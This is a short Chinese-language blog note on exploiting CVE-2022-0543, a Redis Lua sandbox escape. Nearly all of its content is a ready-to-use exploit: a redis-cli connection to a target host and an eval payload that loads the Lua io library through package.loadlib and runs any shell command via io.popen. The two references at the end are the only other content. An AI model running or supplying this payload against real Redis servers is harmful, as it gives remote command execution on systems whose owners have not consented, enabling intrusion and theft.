【笔记】CVE-2022-0543漏洞利用

发表于 更新于 阅读次数:

前言

Redis利用沙盒逃逸漏洞实现远程命令执行

exp

<shell>:远程执行的Shell命令

1
2
redis-cli -h <host>
127.0.0.1:6379> eval 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("<shell>", "r"); local res = f:read("*a"); f:close(); return res' 0

完成

参考文献

哔哩哔哩——xiaodisec
CSDN——7562ajj